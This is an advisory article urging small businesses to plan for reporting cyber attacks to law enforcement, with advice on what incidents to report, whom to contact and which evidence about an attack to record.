You and your employees do your best to maintain a secure computing environment in your small business. But sometimes, despite all the security measures in place, networks can fall victim to an Internet attack or intrusion. Most businesses don’t want to think of this possibility, but it is important to have a security incident reporting plan in place – even if it is never exercised – so in those crucial minutes following an incident, you will already know who needs to be informed – and how – both inside and outside your business.

Optimally, you already have an incident response plan, perhaps as part of your comprehensive security policy. Unfortunately, all too many incident handling policies omit this key step in the process.

To report or not? That is the question
Many businesses do not report cybercrime for fear of the negative impact it could have on their business operations or reputation. The two major qualms regarding incident reporting are fear of business disruption and potential for public exposure. Fears that computers will be seized, and your business will experience major disruption if you report a computer crime, are generally unfounded. Today’s cybercrime investigative services are specially trained in dealing with high-tech crime, and they are very good about keeping business disruption to a minimum. The potential for public exposure is somewhat more complicated. If your cybercrime ends up in court, the incident might well become a matter of public record. Some businesses do not want the fact they were compromised passed on, or details of the incident made public; thus, this can inhibit willingness to report.

Before you make up your mind whether or not to add incident reporting to your security policy, you should learn about any laws or statutes that your state, province, and/or country have in place that concern cybercrime, and know the differences between common facts and fallacies regarding reporting.

Realistic statistics
Studies indicate the number of cyberattacks is on the rise; at the same time, those attacks are spreading faster and becoming more severe. The goal of the annual CSI/FBI Computer Crime and Security survey and similar surveys is to gather data on cybercrime in an effort to present an accurate picture of the state of cyberspace. Software vendors, naturally, want to be informed about attacks so they can stay on top of the latest trends in cybercrime. And law enforcement officials want to work with businesses to deter cyber criminals, but cannot do so if they don’t know what’s really happening.

What should you report?
If you experience a cyber attack that results in damage or loss, unauthorized access, or malicious code left behind by the intruder, it should be reported. Authorities should be informed about any significant attacks that caused harm, or could have potentially caused harm. There is no need to inform law enforcement about common events such as routine probes or port scans that you detect, and probably experience every day. These routine events are typically harmless, and occur so frequently and create so much audit data that law enforcement officials typically don’t have the time to analyze it all.

What you can do now
Right now, before an incident has a chance to happen, construct a plan that includes the following:

• A designated contact person at your business who will handle all incident reports and determine if authorities should be notified.
  
• Contact information for the following: vendors you might need to help during a security emergency, ISPs, other relevant technology providers, and any clients or customers that might need to know about an incident immediately.
  
• Law enforcement contact information. Determining the correct authorities to whom you should report criminal activity is not always cut and dried. The Department of Justice Computer Crime and Intellectual Property Section has posted some helpful contact information to point you in the right direction.

Collecting facts and evidence
If you have a real-time Intrusion Detection solution in place, it will automatically alert you once an attack has been detected, and proceed to respond to the attack attempts, including preventing further information loss or theft. Be prepared to keep a thorough written record of everything that happened and of your response to the incident. This record-keeping is designed to help preserve the chain of evidence, and ultimately, to help law enforcement help you.

Make sure to document the vitals of the attack, such as:

• Date and time of the attack.
  
• Where the attack occurred and what systems were involved.
  
• How the attack was carried out.
  
• Whether the hacker used any identifiable tools.
  
• What the intruder compromised, and/or what damage was done
  .

This information will be helpful for authorities to get an overview of the incident. Your initial observations, the log files, and any other evidence should be turned over to the proper authorities when reporting the security breach.

When you have time to review what happened, you should be able to identify ways the attack could have been prevented, and eliminate the chances for such an attack happening again.

Thwarting cybercriminals
By reporting cybercrime, you are actively doing your part (however minor it may seem) to help improve the overall state of Internet security. If businesses small and large take an active role in reporting such attacks, then those who correlate attack numbers and data for research purposes will have much more accurate information to work with. The overall state of cybersecurity will not improve until authorities can gain insight into the real nature and numbers of attacks.

In order to achieve this, the lines of communication between private sector businesses and interested law enforcement parties need to be opened up. A greater security awareness will result, and more reliable statistics will be able to be developed once private businesses realize the importance of reporting security incidents.